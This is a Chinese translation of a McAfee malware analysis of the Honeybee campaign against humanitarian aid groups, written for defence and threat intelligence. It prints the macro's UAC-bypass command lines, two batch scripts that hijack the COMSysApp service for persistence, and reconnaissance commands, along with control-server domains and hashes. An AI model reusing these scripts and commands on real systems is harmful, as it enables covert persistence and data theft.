人道主义援助组织也中恶意文档的招:McAfee 对丧心病狂的Honeybee 行动的调查报告

导语:McAfee高级威胁研究分析师发现了一项针对人道主义援助组织的新的恶意行动,该行动利用朝鲜的政治话题作为诱饵,引诱受害者打开恶意的微软Word文档。分析人员根据攻击中使用的恶意文件名称,将该行动作命为Honeybee。

McAfee高级威胁研究分析师发现了一项针对人道主义援助组织的新的恶意行动,该行动利用朝鲜的政治话题作为诱饵,引诱受害者打开恶意的微软Word文档。分析人员根据攻击中使用的恶意文件名称,将该行动作命为Honeybee。

高级威胁研究分析师还发现了表明了战术转变的恶意文件,该恶意文件与上述恶意文件为 同一个人创作。该创作者创作的恶意文件不包含典型的诱饵,而是使用文字兼容信息引诱受害者打开。

高级威胁研究小组也观察到从1月15日到17日该恶意文件在越南出现了大量的植入。

1.png

背景

2.png

115日,高级威胁研究分析师发现了一种使用SYSCON backdoor. 新版本的操作。117号,韩语Wordmanual.doc以原作者名字Honeybee出现在越南。

3.png

文档属性

该恶意文件包含一个可视化的基本宏,它删除并执行了名为“SYSCON”植入物的更新版本,作为几个恶意行动的一部分,SYSCON利用与朝鲜相关的话题,在2017年出现在一些恶意Word文档中。恶意的可视化的基本脚本使用唯一的密钥(定制字母)来编码数据。这在以前使用SYSCON的行动中我们就看到过。这一密钥也被用于Honeybee活动,似乎自2017年8月起就开始使用了。

4.png

诱饵文件的例子

在1月17日至2月3日期间,又有几个文件出现。所有这些文件都包含相同的可视化基本宏代码,并且作者名字都是Honeybee。一些恶意文件是没有植入物的测试文件。根据我们的分析,这些文件大多是在韩国上传的,这表明该恶意文件的一些目标是在韩国。这些Honeybee文件不包含任何特定的诱饵,而是用“不兼容”消息的变体试图说服用户启用内容。

我们还观察到一个由Windows用户在1月12日创建的相关恶意文件,其中包含不同的编码密钥,但本质上使用的是与最近的Honeybee文件相同的宏和相同类型的植入物。这份文件名为“国际红十字会与红新月会——朝鲜国家办公室”,将植入物放置在控制服务器地址1113427185.ifastnet.org上,该网站解析结果是,与Honeybee事件植入物使用的是同一台服务器。

5.png

控制服务器1113427185.ifastnet.org的目录内容

6.png

Honeybee样本ftp.byethost11.com的目录内容

7.png

20182月开始的Honeybee样本中记录的受牵连的机器

MaoCheng Dropper

除了发现这些恶意文件外,高级威胁研究小组还发现了一个基于win32的可执行病毒释放器。该病毒释放器使用了从Adobe系统窃取的数字签名。该证书也被用于另一个1月16日编译的韩语恶意软件(散列:35904 f482d37f5ce6034d6042bae207418e450f4),该恶意软件的程序数据库(PDB)路径比较有趣。

D:\Task\DDE Attack\MaoCheng\Release\Dropper.pdb

该恶意软件是一个Win32可执行文件,它把自己伪装成一个基于其图标的Word文档。这是一个与其他Word文档所观察到的相同类型的恶意软件的病毒释放器。该样本还释放了一个带有Honeybee作者姓名的诱饵文档。然而,该样本有一个bug,干扰了病毒释放器的执行流程,这意味着在代码签署之后,作者并没有对恶意软件进行测试。

8.png

诱饵文件使用基于云计算的软件公司Xero作为诱饵:

9.png

来自MaoCheng dropper的一个诱饵文件

可疑人员

高级威胁研究小组已经确定了与最近恶意活动有关的以下人员([email protected])。据我们分析,此人注册了两个免费的主机账户:navermail.byethost3.com,该网址是流行的韩国搜索引擎,以及nihon.byethost11.com。我们分析的所有植入物中,电子邮件地址均用于注册一个控制服务器的免费帐户。

技术分析

从此次攻击概述开始:

10.png

恶意活动中涉及的组件。

11.png

该恶意Word文件是感染链的开始,它充当两个DLL文件的病毒释放器。Word文件中包含恶意Visual Basic宏代码,当使用Word打开该文档,恶意Visual Basic宏代码利用Document_Open() 自动加载功能运行。该word文件还包含一个base64编码的文件(用一个自定义键编码),该编码文件通过宏来读取、解码并将其释放到磁盘。

12.png

Document_Open()子程序执行恶意功能

Visual Basic宏执行以下任务:

·         打开处理恶意文件,读取已编码的CAB文件

·         解码CAB文件并将其写入到磁盘的 %temp%\setup.cab上

13.png

Word文件中编码CAB文件

14.png

将CAB文件解码并写入%temp%

15.png

在Visual Basic内存缓冲中解码的CAB文件

CAB文件包含以下文件和功能:

· dll:用于启动批处理文件的恶意DLL(通过cliconfg.exe用于 UAC绕过)。该DLL包含以下PDB路径: D:\Task\MiMul\NTWDBLIB\Release\NTWDBLIB.pdb。

· bat:用于设置COMSysApp服务的批处理文件,适用于x64系统

· bat:用于设置COMSysApp服务的批处理文件,适用于x86系统

· ini:一个带有base64编码数据的数据文件,用于连接到FTP服务器。凭据被编码在.ini文件中。

包含在ipnet.ini.中解码的凭证数据

· dll:恶意的DLL文件作为一个服务运行(使用svchost.exe)。该DLL包含以下PDB路径:  D:\Task\MiMul\FTPCom_vs10\Release\Engine.pdb。

· 然后,宏使将文件提取到%systemroo%system32。使用wusa.exe 或者 expand.exe (根据操作系统选择)再次绕过UAC提示

· 一旦文件被提取出来,Visual Basic宏将删除CAB文件并通过cliconfg. exe运行恶意NTWDBLIB.dll。(为了获得特权并绕过UAC保护)

· Visual Basic宏所使用的命令行

cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe
cmd /c expand %TEMP%\setup.cab -F:* %SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe

NTWDBLIB.dll 和 cliconfg.exe的结合用于绕过UAC保护,这在Windows是很常见的攻击。通过DLL绕过UAC需要:

·清单中一个带有自动提升属性的Windows可执行文件

·安全目录中的Windows可执行文件(%systemroot%system32)

恶意NTWDBLIB DLL执行了一个简单的任务,即通过运行CAB文件中包含的两个批处理文件中的一个设置恶意ipnet.dll作为服务(该 CAB文件也被释放到%systemroot%\system32)

17.png

NTWDBLIB在cliconf.exe的环境下执行安装批处理文件程序

攻击中涉及的批处理文件修改了系统服务COMSysApp来加载恶意ipnet.dll。批处理文件的内容根据操作系统的不同而有所不同(x64和x86):

install1.bat (x64)

@echo off
sc stop COMSysApp
sc config COMSysApp type= own start= auto error= normal binpath= "%windir%\SysWOW64\svchost.exe -k COMSysApp"
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v COMSysApp /t REG_MULTI_SZ /d "COMSysApp" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\COMSysApp\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%windir%\SysWOW64\ipnet.dll" /f
sc start COMSysApp
del /f /q %windir%\SysWOW64\install2.bat
del /f /q %windir%\SysWOW64\install1.bat

install2.bat (x86)

@echo off
sc stop COMSysApp
sc config COMSysApp type= own start= auto error= normal binpath= "%windir%\System32\svchost.exe -k COMSysApp"
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v COMSysApp /t REG_MULTI_SZ /d "COMSysApp" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\COMSysApp\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%windir%\system32\ipnet.dll" /f
sc start COMSysApp

批处理文件执行以下任务:

· 停止服务COMSysApp

·将服务配置为自动启动(在系统上设置持久性)

·修改注册表键以启动DLL unser svchost.exe

·指定恶意DLL路径,要加载到svchost进程。

·立即重启服务

·删除批处理文件,以减少系统上的指纹 

IPNet. Dll在svchost.exe上以一种服务的形式运行。 

该恶意DLL还要负责终止cliconfg.exe进程并且删掉恶意的NTWDBLIB.dll使用:

cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL

除非特定的,否则所描述的所有功能都是由恶意服务DLL植入的。

运用朝鲜红十字会的变体

另一个恶意文档病毒释放器的变体(散列: 9e2c0bd19a77d712055ccc0276fdc062e9351436) 使用相同的base64解码方案,该方案带有一个不同的自定义密钥。该文件创建于1月10日。

18.png

诱饵文件的内容

这个变体由两个CAB文件组成,这两个文件被传递到%temp%,这取决于操作系统 (x86 或者 x64)

在这个变体中密钥不同:

·         这两个CAB文件被编码到Word文档的文本框里,而不是附加在DOC文件里

·         有一个适用于x86系统的CAB文件,另一个适用于x64系统

·         该恶意软件样本使用带有dummy.dll的uacme.exe绕开UAC

        ·      exe是易受UAC旁路攻击的程序

        ·     dll运行install.bat来设置服务(和NTWDBLIB.dll一样)

·         取决于操作系统,exe和dummy.dll可以是64位或32位二进制文件。Ipnet.dll也可以是64位或32位。

·         这个Visual Basic宏使用下列命令:

cmd /c expand %TEMP%\setup.cab -F:* %TEMP% && cd /d %TEMP% && del /f /q setup.cab && uacme.exe

·         包含在CAB文件中的控制服务器凭证信息是不同的:

19.png

包含在另一个ipnet.ini中的解码凭证数据

该变体和原始恶意软件样本之间的相似之处:

·         服务名称相同:COMSysApp

·         DLL和ini文件包含了与本文中其他部分所描述的相同的功能

数据勘察

下面的信息是从端点收集到的,然后发送到控制服务器

·         系统信息:

     • 计算机名

     • 系统信息使用:cmd /c systeminfo >%temp%\temp.in

     • 当前运行程序使用列表:cmd /c tasklist >%temp%\temp.ini

渗漏

·         数据渗漏程序以下列顺序运行:将temp.ini文件复制到与模式匹配的文本文件中:

From <COMPUTER-NAME> (<Month>-<Day> <Hour>-<Minute>-<Second>).txt. For example, From <COMPUTER-NAME> (01-04 11-40-02).txt

·         现在所有的文本文件都已经被压缩到存档中(%temp%\temp.zip)。

·         zip是用Base64编码的(带有一个自定义密钥,与在恶意文件中使用的密钥的编码方式相同)然后拷贝到post.txt

·         将txt文件上传到控制服务器

附加的指令和功能

基于DLL植入的服务遍历FTP服务器上的/htdocs/目录,并查找带有关键字的任何文件:

·         TO EVERYONE:发给所有受感染终端的指令

·         TO <COMPUTERNAME>:发给与计算机名称匹配的终端的指令

总结

自2017年11月起,Honeybee的发布者就开始使用新的植入物,这是第一个已知的NTWDBLIB安装程序。此外,根据文档和可执行文件中的各种元数据,该作者很可能是韩国人。

恶意文件中使用的技术,如诱饵信息,与我们在韩国看到的情况非常相似。攻击者似乎瞄准了那些参与人道主义援助和朝韩事务的人。我们已经看到这一行动扩展到韩国的边界,目标是越南、新加坡、阿根廷、日本、印度尼西亚和加拿大。

基于McAfee高级威胁研究小组的分析,我们发现该操作中的多个组件从代码的角度来看是独一无二的,即使代码是基于SYSCON后门的以前版本的。还没有观测到新的病毒释放器。MaoCheng 病毒释放器貌似是专门为这次行动而开发的,并且只出现过两次。

感染指标

MITRE ATT&CK 技术

·          修改现有服务

·  代码签名

·  文件删除

·  De混淆/解码文件或信息

·  系统信息披露

·  过程披露

·  服务执行

·  RunDLL32

·  脚本

·  命令行界面

·  来自本地系统的数据

·  自动过滤

·  数据加密

·  通常使用的端口

·  绕过用户帐户控制

散列

·         fe32d29fa16b1b71cd27b23a78ee9f6b7791bff3

·         f684e15dd2e84bac49ea9b89f9b2646dc32a2477

·         1d280a77595a2d2bbd36b9b5d958f99be20f8e06

·         19d9573f0b2c2100accd562cc82d57adb12a57ec

·         f90a2155ac492c3c2d5e1d83e384e1a734e59cc0

·         9b832dda912cce6b23da8abf3881fcf4d2b7ce09

·         f3b62fea38cb44e15984d941445d24e6b309bc7b

·         66d2cea01b46c3353f4339a986a97b24ed89ee18

·         7113aaab61cacb6086c5531a453adf82ca7e7d03

·         d41daba0ebfa55d0c769ccfc03dbf6a5221e006a

·         25f4819e7948086d46df8de2eeeaa2b9ec6eca8c

·         35ab747c15c20da29a14e8b46c07c0448cef4999

·         e87de3747d7c12c1eea9e73d3c2fb085b5ae8b42

·         0e4a7c0242b98723dc2b8cce1fbf1a43dd025cf0

·         bca861a46d60831a3101c50f80a6d626fa99bf16

·         01530adb3f947fabebae5d9c04fb69f9000c3cef

·         4229896d61a5ad57ed5c247228606ce62c7032d0

·         4c7e975f95ebc47423923b855a7530af52977f57

·         5a6ad7a1c566204a92dd269312d1156d51e61dc4

·         1dc50bfcab2bc80587ac900c03e23afcbe243f64

·         003e21b02be3248ff72cc2bfcd05bb161b6a2356

·         9b7c3c48bcef6330e3086de592b3223eb198744a

·         85e2453b37602429596c9681a8c58a5c6faf8d0c

域名

·         ftp.byethost31.com

·         ftp.byethost11.com

·         1113427185.ifastnet.org

·         navermail.byethost3.com

·         nihon.byethost3.com

源链接

Hacking more

...